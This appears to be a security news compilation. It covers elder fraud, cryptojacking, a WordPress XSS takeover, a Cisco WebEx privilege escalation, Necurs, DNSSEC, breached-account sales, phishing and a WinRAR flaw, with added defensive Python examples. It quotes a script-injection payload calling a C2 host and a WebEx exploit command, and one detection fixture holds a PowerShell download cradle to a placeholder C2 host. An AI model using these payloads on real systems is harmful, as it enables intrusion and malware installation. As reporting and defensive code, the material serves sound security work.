ELDERLY FRAUD AND ABUSE IN AMERICA RESOURCES

Please share this important information with those you know.

United States Attorney William P. Barr recently stated that crimes against the elderly target some of the most vulnerable people in our society. Because of their stage in life, they frequently do not have the opportunity to recover, and the losses are devastating to them.

Whether as the result of isolation, diminished cognition, financial insecurity, trusting too much, being ashamed to report being scammed or concerned about how relatives will react, serious concern for health or other causes, many of these crimes go unreported.

Information on The Federal Bureau of
Investigation Site

https://www.fbi.gov/scams-and-safety/common-fraud-schemes/seniors

Information on The Department of
Justice Site

The video below discusses scams and identity theft, looks at trends and gives tips and tools, with a focus on the Federal Trade Commission’s Pass It On Campaign:

Extent of elder abuse, causes and characteristics, addressing mistreatment, financial exploitation and perpetrators:

Abuse by caregivers,
domestic violence, fraud and financial abuse, training resources and tools, and
additional information and resources: https://www.ncjrs.gov/elderabuse/

Contains prosecutor
video series, federal financial exploitation resources, rural and tribal
resources, multidisciplinary guide and toolkit, webinars for elder abuse
professionals, elder abuse statutes and elder justice resources by state: https://justice.gov/elderlyjustice

Information on The Better Business
Bureau Site

The BBB tracks reported
scams throughout the U.S.

If you become aware of
elder fraud and/or abuse, you are right to be concerned. If you SEE SOMETHING,
please SAY SOMETHING in a timely manner to law enforcement, security and/or
your supervisor, and give the authorities the chance to make a difference.

The Virtual Security Summit by Microsoft

This free event has lots of good content; the sessions are listed below. The event is streaming live April 16, 9-12 noon PT.
To register, go here.

Sessions and featured speakers:

Securing emerging technologies
Learn about the new trends that will affect cybersecurity into the future of Internet of Things and Machine Learning, and learn how to maintain your organization’s resiliency throughout innovations in cybersecurity.
Featured speakers: Sian John, Chief Security Advisor, Microsoft EMEA; Hafid Elabdellaoui, Chief Security Advisor, Microsoft

Evolution of cyberthreats: Customer conversation identity and threat
Join this discussion on the evolution of cyberthreats and the latest thinking on identity and threat protection tactics.
Featured speakers: Joram Borenstein, General Manager, Cybersecurity Solutions Group, Microsoft; Kostas Georgakopoulos, Chief Information Security Officer, Procter & Gamble

The importance of security frameworks CIS, NIST and others
Fraud Detection as a Service (FDaaS) is helping government customers detect and prevent improper payments. Learn how your agency can save significant staff resources and ensure proper distribution of funds.
Featured speakers: Curtis W. Dukes, Executive Vice President and General Manager, Security Best Practices and Automation Group, CIS; Sean Sweeney, Americas Director, Cybersecurity Solutions Group, Microsoft

Threat of Cryptojacking Still an Issue

In November 2018, Forbes ran an article about the increase in cryptojacking. At the time, the Cyber Threat Alliance (CTA) was reporting a 629% increase in infections in the short span between Q1 and Q2 of 2018. Infections had grown from an estimated 400,000 in Q4 2017 to 2.5 million infected machines in Q2 2018, and 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has also grown. For example, WebCobra, a Russian threat found by McAfee Labs researchers, was able to drop one of two different payloads depending on the architecture it detected on the infected machine.

The threats are also becoming more sophisticated. 360 Total Security researchers have released details of the newer PsMiner malware, which is designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP and SQL Server in order to spread from server to server and mine Monero.

The worm uses a file called Systemctl.exe, written in Go, to bundle and then download the exploit modules it uses to attack Windows servers. In addition to the exploits, PsMiner can brute-force its way into a system: when it detects weak or default credentials, it uses a brute-force password-cracking component.

Once PsMiner has access to a system, it uses a PowerShell command to download WindowsUpdate.ps1, which carries the malicious payload and the master module that drops the Monero miner on the system. The malware then copies itself into the temp directory and creates a scheduled task called “Update service for Windows Service” that runs once every 10 minutes to prolong and refresh the infection. By using the XMRig CPU miner with a custom mining profile and Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This shows the level of sophistication to which bad actors now have access. Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These apps have since been removed from the Microsoft Store, but they show a troubling pattern of predatory behavior. Estimates indicate that ten times more organizations were affected by cryptojacking than by ransomware last year. It is clear that cryptojacking is still a threat to consider in 2019.
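The persistence behaviour described above (a named scheduled task, a PowerShell download cradle, a binary re-run from the temp directory every 10 minutes) is something a defender can hunt for in scheduled-task inventories. The following is an added example, not code from the page or from 360 Total Security: it runs a few triage rules over a constructed CSV that loosely mimics `schtasks /query /v /fo CSV` output (the column names are an assumption, not a verbatim capture, and the C2 host is a placeholder).

```python
"""Triage Windows scheduled tasks for PsMiner-style persistence (added example)."""
import csv
import io
import re

# Constructed sample rows, not real telemetry; the C2 hostname is a placeholder.
SAMPLE_TASKS = """\
TaskName,Author,Task To Run,Repeat: Every,Run As User
\\Microsoft\\Windows\\Defrag\\ScheduledDefrag,Microsoft Corporation,%windir%\\system32\\defrag.exe -c -h -o -$,N/A,SYSTEM
\\Update service for Windows Service,ADMIN,powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://C2-PLACEHOLDER.invalid/WindowsUpdate.ps1'),0:10:00,SYSTEM
\\OneDrive Standalone Update Task,CONTOSO\\user,C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe,N/A,CONTOSO\\user
\\Cleanup,CONTOSO\\user,C:\\Users\\user\\AppData\\Local\\Temp\\Systemctl.exe,0:10:00,SYSTEM
"""

# Task name reported for PsMiner's persistence task (from the write-up above).
KNOWN_TASK_NAMES = {"update service for windows service"}
# Common PowerShell download/decode cues; tune these to your environment.
DOWNLOAD_CUES = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc\b", re.I)
TEMP_PATHS = re.compile(r"\\temp\\|%temp%", re.I)
SHORT_INTERVAL_MINUTES = 10


def repeat_minutes(value):
    """Parse an 'H:MM:SS' repeat interval; return None for N/A or malformed input."""
    parts = value.strip().split(":")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    hours, minutes, seconds = (int(p) for p in parts)
    return hours * 60 + minutes + seconds / 60


def triage_tasks(csv_text):
    """Return [(task_name, [reasons])] for every row that trips at least one rule."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = []
        name = row["TaskName"].strip("\\").lower()
        command = row["Task To Run"]
        interval = repeat_minutes(row["Repeat: Every"])
        if name in KNOWN_TASK_NAMES:
            reasons.append("task name matches known PsMiner persistence task")
        if re.search(r"powershell", command, re.I) and DOWNLOAD_CUES.search(command):
            reasons.append("PowerShell download cradle in task command")
        if TEMP_PATHS.search(command) and interval is not None and interval <= SHORT_INTERVAL_MINUTES:
            reasons.append("binary in temp directory re-run on a short interval")
        if reasons:
            findings.append((row["TaskName"], reasons))
    return findings


if __name__ == "__main__":
    for task, reasons in triage_tasks(SAMPLE_TASKS):
        print(task)
        for reason in reasons:
            print("   -", reason)
```

On a live host, feed the real `schtasks /query /v /fo CSV` export through `triage_tasks` after mapping its column names onto the ones assumed here.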

Sources
https://www.bleepingcomputer.com/news/security/malware-spreads-as-a-worm-uses-cryptojacking-module-to-mine-for-monero/

https://www.forbes.com/sites/rachelwolfson/2018/11/13/cryptojacking-on-the-rise-webcobra-malware-uses-victims-computers-to-mine-cryptocurrency/#20183346c336

https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/

Abandoned Cart plugin for WordPress sites exploit

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t, all without the effort of hauling those things around a labyrinth of smells and sounds. With the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you want to pick up where you left off after a sudden pressing matter arises, or if you simply lose interest for the time being. But Wordfence security researchers have noticed a flaw in the Abandoned Cart plugin that enables a complete site takeover, along with a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin had a distinct lack of sanitization on the input and output of the fields used when a user begins checking out. The billing_first_name and billing_last_name fields are stored as entered, and the two are then displayed concatenated in a customer field when the administrator logs in to view the dashboard. The attack generates random first and last names and random email addresses so that the form entries are accepted, but enters both the first and the last name in the billing_first_name field and “<script src=hXXps://bit[.]ly/2SzpVBY></script>” as the billing_last_name field. The URL points to a command-and-control (C2) server, “hXXps://cdn-bigcommerce[.]com/visionstat.js”, which serves a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to perform trusted actions on the WordPress site through hidden iframes, acting while the user is unaware of the intrusion. The first action is creating an administrative user for the site whose credentials the attacker holds. Who needs a backdoor when you can make keys to the front door for yourself? The username on these clandestine accounts has consistently been found to be “woouser”, with a “woouser” email at mailinator, a free disposable email service. The malicious JavaScript then infects an inactive plugin with a malicious script that keeps listening for commands from the C2 server and can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server, and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released which uses WordPress’ own data sanitizer to exclude names beginning with “<” and any account with “woouser” in the email. While this prevents the initial attack from creating adversary-controlled accounts, it doesn’t address the code injection in deactivated plugins.
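The stored XSS above comes down to two untrusted fields being written into admin-dashboard HTML unchanged. The following is an added example, not the Abandoned Cart plugin’s code, written in Python rather than the plugin’s PHP: a toy order store with the vulnerable renderer beside one that escapes on output, plus an input rule in the spirit of the patch (reject names starting with “<” and emails containing “woouser”). The C2 address and customer records are constructed.

```python
"""Stored XSS via billing name fields: vulnerable and hardened rendering (added example)."""
import html

# Constructed checkout submissions: one ordinary customer, one hostile one.
# The script host is a placeholder, not the real indicator from the write-up.
ORDERS = [
    {"billing_first_name": "Ada", "billing_last_name": "Lovelace",
     "email": "ada@example.com"},
    {"billing_first_name": "Mara Quinn",
     "billing_last_name": "<script src=https://c2.invalid/visionstat.js></script>",
     "email": "woouser@example.com"},
]


def render_customer_unsafe(order):
    """The flaw: raw field values interpolated straight into dashboard HTML."""
    return "<td class=\"customer\">{} {}</td>".format(
        order["billing_first_name"], order["billing_last_name"])


def render_customer_safe(order):
    """Output encoding: every untrusted value is HTML-escaped at render time,
    so a stored <script> tag is shown as text instead of being executed."""
    first = html.escape(order["billing_first_name"], quote=True)
    last = html.escape(order["billing_last_name"], quote=True)
    return "<td class=\"customer\">{} {}</td>".format(first, last)


def accept_checkout(order):
    """Input rule in the spirit of the patch described above. It is a
    blocklist, so it complements output escaping rather than replacing it."""
    for field in ("billing_first_name", "billing_last_name"):
        if order[field].lstrip().startswith("<"):
            return False
    if "woouser" in order["email"].lower():
        return False
    return True


def dashboard_rows(orders, renderer=render_customer_safe):
    """Render the rows an administrator would see for accepted orders."""
    return [renderer(o) for o in orders if accept_checkout(o)]


if __name__ == "__main__":
    print("unsafe:", render_customer_unsafe(ORDERS[1]))
    print("safe:  ", render_customer_safe(ORDERS[1]))
    print("rows:  ", dashboard_rows(ORDERS))
```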

Sources:
https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cart-plugin-leads-to-wordpress-site-takeovers/

https://nakedsecurity.sophos.com/2019/03/13/update-now-wordpress-abandoned-cart-plugin-under-attack/

New Elevation of Privilege Vulnerability in Cisco Webex

     A new elevation of privilege vulnerability has been discovered in the Cisco WebEx Meetings desktop app for Windows® by security researcher Marcos Accossatto from SecureAuth Exploits’ Writers Team.

     This vulnerability, tracked as CVE-2019-1674, is an OS Command Injection that can be used to bypass new controls that Cisco put in place after patching a previously disclosed DLL hijacking issue in 2018. This vulnerability could allow a local attacker to elevate their privileges by invoking the update service command. An attacker could exploit this flaw by swapping out the Cisco WebEx Meetings update binary with “a previous vulnerable version through a fake update… that will load a malicious DLL.” The researchers also noted that while this vulnerability can only be exploited locally, it could be exploited remotely in an Active Directory setup through operating system remote management tools.

    The update service for Cisco WebEx Meetings uses XML to check new files when installing an update. However, the service failed to validate the version numbers of the new files. This is how attackers could potentially insert different files into the update service and trick it into “updating” the program to an older, insecure version of Cisco WebEx Meetings. According to SecureAuth, “The vulnerability can be exploited by copying to a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).” The research team also released a two-step Proof of Concept showing how this vulnerability can be exploited.

     The timeline for this vulnerability is about 2 months long and is as follows: on Dec. 4, 2018, SecureAuth sent the initial notification to Cisco PSIRT. On Dec. 5, 2018, Cisco confirmed they received the advisory and opened a case for it, and on Dec. 7, 2018, Cisco confirmed that they were able to reproduce the vulnerability and began working on a plan to fix it. On Dec. 10, 2018, Cisco told SecureAuth that the fix for the vulnerability would be generally available by the end of February. After a couple of attempts by SecureAuth to get updates on the status of the patch for the vulnerability, Cisco, on Jan. 22, 2019, said they were still aiming for an end of February release. Finally, on Feb. 11, 2019, Cisco confirmed that Feb. 27, 2019 would be the official disclosure date, and have now disclosed a patch for this security vulnerability.

    If your company uses Cisco WebEx Meetings desktop app on Windows, be sure to update it immediately to avoid any potential attacks due to this vulnerability.
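The root cause above is an update service that trusted an XML description of new files without checking their versions or where they came from. The following is an added example, not Cisco’s or SecureAuth’s code: a toy update-manifest validator (manifest format, field names, staging directory and version numbers are all assumptions) that refuses any file staged outside the trusted directory and any file whose version is lower than the one installed.

```python
"""Update-manifest validation that refuses rollbacks and untrusted paths (added example)."""
import ntpath
import xml.etree.ElementTree as ET

TRUSTED_STAGING = r"C:\ProgramData\Vendor\Updates"            # assumed location
INSTALLED = {"ptUpdate.exe": "3.8.1", "wbxtrace.dll": "3.8.1"}  # constructed versions

# Constructed manifests: a legitimate update, and a rollback attempt that also
# points one file at a folder a low-privileged user controls.
GOOD_MANIFEST = """<update>
  <file name="ptUpdate.exe" version="3.8.2" path="C:\\ProgramData\\Vendor\\Updates\\ptUpdate.exe"/>
</update>"""
ROLLBACK_MANIFEST = """<update>
  <file name="ptUpdate.exe" version="3.6.0" path="C:\\ProgramData\\Vendor\\Updates\\ptUpdate.exe"/>
  <file name="wbxtrace.dll" version="3.8.1" path="C:\\Users\\low\\stage\\wbxtrace.dll"/>
</update>"""


def parse_version(text):
    """'3.8.2' -> (3, 8, 2); raises ValueError on anything non-numeric."""
    return tuple(int(part) for part in text.strip().split("."))


def under_trusted_dir(path, root=TRUSTED_STAGING):
    """True only if the normalized absolute path sits inside the trusted root."""
    drive, _ = ntpath.splitdrive(path)
    root_n = ntpath.normpath(root).lower()
    target = ntpath.normpath(path).lower()
    return bool(drive) and target.startswith(root_n + "\\")


def validate_manifest(xml_text, installed=INSTALLED):
    """Return (accepted_names, rejections); each rejection is (name, reason)."""
    accepted, rejections = [], []
    for entry in ET.fromstring(xml_text).findall("file"):
        name, version, path = entry.get("name"), entry.get("version"), entry.get("path")
        if not (name and version and path):
            rejections.append((name or "?", "incomplete entry"))
            continue
        if not under_trusted_dir(path):
            rejections.append((name, "path outside trusted staging directory"))
            continue
        try:
            new, cur = parse_version(version), parse_version(installed.get(name, "0"))
        except ValueError:
            rejections.append((name, "malformed version"))
            continue
        if new < cur:
            rejections.append((name, "rollback to older version refused"))
            continue
        accepted.append(name)
    return accepted, rejections


if __name__ == "__main__":
    print("good:    ", validate_manifest(GOOD_MANIFEST))
    print("rollback:", validate_manifest(ROLLBACK_MANIFEST))
```

A real updater would additionally verify a signature over the manifest and each file; that step is outside this example.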
Sources: 
https://www.bleepingcomputer.com/news/security/new-elevation-of-privilege-vulnerability-found-in-cisco-webex-meetings/
https://securityaffairs.co/wordpress/81751/security/cisco-webex-elevation-privilege.html
https://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability

CenturyLink Announces New Threat Research on Necurs

“Necurs is the multitool of botnets, evolving from operating as a spam botnet delivering banking trojans and ransomware to developing a proxy service, as well as cryptomining and DDoS capabilities,” said Mike Benjamin, head of Black Lotus Labs. “What’s particularly interesting is Necurs’ regular cadence of going dark to avoid detection, reemerging to send new commands to infected hosts and then going dark again. This technique is one of the many reasons Necurs has been able to expand to more than half a million bots around the world.”

Key Takeaways

  • Beginning in May of 2018, Black Lotus Labs observed regular, sustained downtime of roughly two weeks, followed by roughly three weeks of activity, for the three most active groups of bots comprising Necurs.
  • Necurs’ roughly 570,000 bots are distributed globally, with about half located in the following countries, in order of prevalence: India, Indonesia, Vietnam, Turkey and Iran.
  • Necurs uses a domain generation algorithm (DGA) to obfuscate its operations and avoid takedown. However, DGA is a double-edged sword: because the DGA domains Necurs will use are known in advance, security researchers can use methods like sinkholing DGA domains and analyzing DNS and network traffic to enumerate bots and command and control (C2) infrastructure.
  • CenturyLink took steps to mitigate the risk of Necurs to customers, in addition to notifying other network owners of potentially infected devices to help protect the internet.
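The “double-edged sword” in the third takeaway is worth seeing in code. The following is an added example, not Black Lotus Labs’ code, and the generator in it is a labelled toy, not Necurs’ real DGA: it pre-computes the toy DGA’s domains for a window of days (the list a defender would sinkhole) and matches constructed resolver log lines against that list to enumerate the hosts that queried them.

```python
"""Enumerating likely bots from DNS logs with pre-generated DGA domains (added example)."""
import datetime
import hashlib

TLDS = ("com", "net", "biz")


def toy_dga(day, count=8, seed="toy-seed"):
    """Deterministic toy DGA (NOT Necurs' algorithm): one domain per (seed, day, index)."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day.isoformat()}|{i}".encode()).hexdigest()
        label = "".join(chr(ord("a") + int(ch, 16) % 26) for ch in digest[:12])
        domains.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return domains


def expected_domains(start, days):
    """Union of toy DGA output for `days` consecutive days from `start`: the sinkhole list."""
    out = set()
    for offset in range(days):
        out.update(toy_dga(start + datetime.timedelta(days=offset)))
    return out


def enumerate_bots(log_lines, dga_domains):
    """Map each client that queried a DGA domain to the set of names it asked for.

    Expected line shape (constructed format): 'timestamp client_ip qname qtype'.
    Trailing dots and letter case in qnames are normalized; malformed lines are skipped.
    """
    hits = {}
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, qname = parts[1], parts[2].rstrip(".").lower()
        if qname in dga_domains:
            hits.setdefault(client, set()).add(qname)
    return hits


TODAY = datetime.date(2019, 3, 1)
DGA_SET = expected_domains(TODAY, 3)   # today plus the next two days
_today_names = toy_dga(TODAY)

# Constructed resolver log: two hosts asking for DGA names, one benign host, one bad line.
SAMPLE_LOG = [
    f"2019-03-01T10:00:01Z 10.1.1.20 {_today_names[0]} A",
    f"2019-03-01T10:00:02Z 10.1.1.20 {_today_names[3]}. A",
    "2019-03-01T10:00:03Z 10.1.1.21 www.example.com A",
    f"2019-03-01T10:00:04Z 10.1.1.22 {_today_names[5].upper()} A",
    "garbage line",
]

if __name__ == "__main__":
    for client, names in sorted(enumerate_bots(SAMPLE_LOG, DGA_SET).items()):
        print(client, "->", sorted(names))
```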


SOURCE CenturyLink, Inc.

ICANN urges adopting DNSSEC now

With DNS servers being attacked all over the world, the Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. The organization also reaffirms its commitment to engage in collaborative efforts to ensure the security, stability and resiliency of the Internet’s global identifier systems.

As one of many entities engaged in the decentralized management of the Internet, ICANN is specifically responsible for coordinating the top-most level of the DNS to ensure its stable and secure operation and universal resolvability.

On 15 February 2019, in response to reports of attacks against key parts of the DNS infrastructure, ICANN offered a checklist of recommended security precautions for members of the domain name industry, registries, registrars, resellers, and related others, to proactively take to protect their systems, their customers’ systems and information reachable via the DNS.

Public reports indicate that there is a pattern of multifaceted attacks utilizing different methodologies. Some of the attacks target the DNS, in which unauthorized changes to the delegation structure of domain names are made, replacing the addresses of intended servers with addresses of machines controlled by the attackers. This particular type of attack, which targets the DNS, only works when DNSSEC is not in use. DNSSEC is a technology developed to protect against such changes by digitally ‘signing’ data to assure its validity. Although DNSSEC cannot solve all forms of attack against the DNS, when it is used, unauthorized modification to DNS information can be detected, and users are blocked from being misdirected.

ICANN has long recognized the importance of DNSSEC and is calling for full deployment of the technology across all domains. Although this will not solve the security problems of the Internet, it aims to assure that Internet users reach their desired online destination by helping to prevent so-called “man in the middle” attacks where a user is unknowingly re-directed to a potentially malicious site. DNSSEC complements other technologies, such as Transport Layer Security (most typically used in HTTPS), that protect the end user/domain communication.

As the coordinator of the top-most level of the DNS, ICANN is in the position to help mitigate and detect DNS-related risks, and to facilitate key discussions together with its partners. The organization believes that all members of the domain name system ecosystem must work together to produce better tools and policies to secure the DNS and other critical operations of the Internet. To facilitate these efforts, ICANN is planning events for the Internet community to address DNS protection. The first is an open session during the upcoming ICANN64 public meeting on 9-14 March 2019, in Kobe, Japan.

As we learn more information, updates may be provided. For information about ICANN64, visit https://meetings.icann.org/kobe64.

This article is reposted from the ICANN site as an important security notice to all who use or run DNS servers.

617 million accounts stolen

According to The Register (theregister.co.uk), 617 million accounts stolen from 16 hacked websites are now for sale on the dark web, the seller boasts.

Some 617 million online account details stolen from 16 hacked websites are on sale from today on the dark web, according to the data trove’s seller.

For less than $20,000 in Bitcoin, it is claimed, the following pilfered account databases can be purchased from the Dream Market cyber-souk, located in the Tor network:

Dubsmash (162 million),
MyFitnessPal (151 million),
MyHeritage (92 million),
ShareThis (41 million),
HauteLook (28 million),
Animoto (25 million),
EyeEm (22 million),
8fit (20 million),
Whitepages (18 million),
Fotolog (16 million),
500px (15 million),
Armor Games (11 million),
BookMate (8 million),
CoffeeMeetsBagel (6 million),
Artsy (1 million), and
DataCamp (700,000).

The hacker told The Register that his goal in putting up the stolen accounts was to ‘make life easier for hackers’. He plans to sell the information to anyone who promises to keep the data secret. This attacker has been hacking accounts since 2012 and has information on at least 20 databases. Further, the hacker stated:

“I don’t think I am deeply evil. I need the money.”
“Security is just an illusion. I started hacking a long time ago. I’m just a tool used by the system. We all know measures are taken to prevent cyber attacks, but with these upcoming dumps, I’ll make hacking easier than ever.”

To read the full article go here 

Social Media Phishing Attack

    Social media has changed how the world interacts in many ways, such as closer interaction between businesses and their customers, law enforcement alerts, and more. Creators of public content who want any real degree of reach involve social media in their business and marketing plans somehow, and many require logging in through social media to view content.

    There are many methods to check that a login prompt is legitimate, but a new phishing technique discovered by researchers at password management company Myki throws the usual precautions out the window. Phishing is a fraudulent attempt to obtain sensitive personal information by posing as a legitimate entity, such as a company or a website. It is a form of social engineering and is very popular and successful because of the willingness of many to take things on the internet at face value.

    Recent years have shown an increase in phishing attempts leading to serious data breaches, as was the case in the San Diego Unified School District breach involving social security numbers and other personal information of over 500,000 students and staff. 
   
    Researchers at Myki discovered that attackers were convincing victims to visit fraudulent sites for blogs and services that first required logging in with a Facebook account to access the content. The sites looked legitimate, as did the pop-up window for the Facebook login: the URL shown was www.facebook.com, it used HTTPS with a green padlock indicating a valid certificate, and browser add-ons for detecting malicious domains threw no warnings. Credentials were still harvested by the attacker, because the pop-up was not a real window: it was built with HTML and JavaScript to imitate a browser window but was part of the original page.

    The only way to tell is to try to drag the window away from the browser: if it is fake, part of the window will disappear past the edge of the browser instead of moving as a separate entity. While harvesting Facebook login credentials may not seem like much of a threat beyond seeing what cat pictures friends have posted, many people reuse the same or similar credentials across many sites, which gives attackers a head start in gaining unauthorized access to other accounts. The same technique could also show up elsewhere in the future, such as e-commerce sites asking for PayPal logins or something similar.

Sources
https://threatpost.com/sneaky-phishing-scam-facebook/141869/
https://threatpost.com/san-diego-school-district-data-breach-hits-500k-students/140366/
https://thehackernews.com/2019/02/advance-phishing-login-page.html

Vulnerability So Old it Could Vote

     This past week, a vulnerability was found in the WinRAR archive extraction software that has existed for almost 19 years. It was discovered by researchers at Check Point Software Technologies. The exploit allows a path traversal that leads to remote code execution anywhere on the system. The issue stems from a third-party DLL, unacev2.dll, that is used to handle the .ace archive type.
    The bug was discovered by fuzzing WinRAR and identifying the root cause of a crash. When the group identified the problem, they looked for a memory corruption bug, but instead found a logic bug that let the team navigate to any location on the target machine without even needing to know a user name.
     While testing to identify the root cause of the bug, the fuzzer detected an anomaly where bits of the advertisement string and other pieces of the file’s hex dump were placed in a newly created directory and file.
     They were unable to recreate it exactly when attempting the same issue inside WinRAR, due to WinRAR’s file name validation functions. Even though the original case is caught by WinRAR and the unacev2.dll function’s return is cancelled, the folder is still created temporarily because the check for the value that triggers cancellation comes late.
     This allows the creation of empty files wherever the archive’s creator would like. The team goes a step further and circumvents the path limitations set by WinRAR using the cleanPath function that WinRAR uses to remove extraneous ‘C:/’ prefixes from relative paths. By adding another ‘C:/’ the team was able to bypass this and gain path traversal, because the WinRAR path check does not look for ‘C:’, which it assumes cleanPath has already removed. With a path traversal vulnerability found, the team was able to gain an SMB attack vector by adding more arbitrary ‘C:/’ to strings to allow connections. Code execution is obtained by extracting a compressed executable from an ACE archive that has been renamed to .rar into a startup folder, where it will run on machine boot. The code itself is arbitrary and the consequences can be catastrophic.

    You can even ignore usernames by using the WinRAR context-menu subkeys: right-click the archive in question and extract it using that tool. This works because of how ‘C:’ is interpreted by Windows: it represents the current directory of the running process, so inside the WinRAR GUI it would be the WinRAR folder, but using the menu option it becomes C:\Users\<user name>\<location of the file>. When this exploit was reported to WinRAR, they claimed that it was the third party’s code that allowed the arbitrary folder creation and decided to drop support for the ACE archive format.
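The cleanPath bug described above is a general archive-extraction failure mode: a sanitizer strips one prefix and a later check assumes nothing is left. The following is an added example, not WinRAR’s or Check Point’s code: a toy single-strip cleaner with the flawed check beside a containment check that refuses drive letters and absolute names outright and requires the resolved path to stay inside the extraction root. The extraction root and entry names are constructed; ntpath is used so the check runs on any platform.

```python
"""Archive entry path checks: single-strip cleaner vs. containment check (added example)."""
import ntpath

EXTRACT_ROOT = r"C:\Users\victim\Downloads\extract"   # constructed location


def naive_clean_path(name):
    """Strip ONE leading 'C:' prefix, mirroring the fragile cleaner in the write-up."""
    if name[:2].upper() == "C:":
        name = name[2:].lstrip("\\/")
    return name


def naive_is_safe(name):
    """The flawed check: trusts the cleaner and only looks for '..' segments,
    so a name that still carries a drive prefix after cleaning passes."""
    cleaned = naive_clean_path(name)
    return ".." not in cleaned.replace("/", "\\").split("\\")


def safe_extract_target(name, root=EXTRACT_ROOT):
    """Return the absolute path to write, or None if the entry must be refused."""
    drive, rest = ntpath.splitdrive(name)
    if drive or rest.startswith(("\\", "/")):
        return None                      # never honour drive letters or absolute names
    root_n = ntpath.normpath(root)
    target = ntpath.normpath(ntpath.join(root_n, rest))
    if target != root_n and not target.startswith(root_n + "\\"):
        return None                      # resolves outside the extraction root
    return target


if __name__ == "__main__":
    for entry in (r"docs\readme.txt", r"..\..\evil.exe", r"C:\C:\Users\victim\evil.exe"):
        print(entry, "| naive:", naive_is_safe(entry), "| hardened:", safe_extract_target(entry))
```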

Sources
https://research.checkpoint.com/extracting-code-execution-from-winrar/

https://news.softpedia.com/news/19-year-old-vulnerability-discovered-in-winrar-525050.shtml